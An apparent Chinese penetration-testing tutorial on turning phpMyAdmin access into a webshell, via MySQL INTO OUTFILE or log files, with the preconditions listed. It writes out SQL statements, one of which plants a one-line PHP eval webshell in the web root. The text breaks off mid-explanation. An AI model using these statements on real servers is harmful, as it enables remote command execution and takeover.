渗透测试-利用PHPMyAdmin进行Shell注入攻击
发布时间
阅读量:
阅读量
利用phpmyadmin来getshell有两种方式
- 1、通过into outfile功能将单条语句直接存入文件内
- 2、借助MySQL的日志文件实现获取服务器权限
无论采用上述哪种方法,均需符合以下三个前提条件:
未对文件存储路径进行限制 secure_file_priv=

当前用户具备文件书写权限
了解网站根目录路径 — C:\phpStudy\PHPTutorial\WWW
第一种方法概述
select "<?php phpinfo();?>" into outfile "/var/www/html/test.php" --- linux
select '<?php @eval($_REQUEST[cmd]);?>' into outfile 'c:\ phpStudy\ PHPTutorial\ www\ test.php' --- windows
在phpm
全部评论 (0)
还没有任何评论哟~
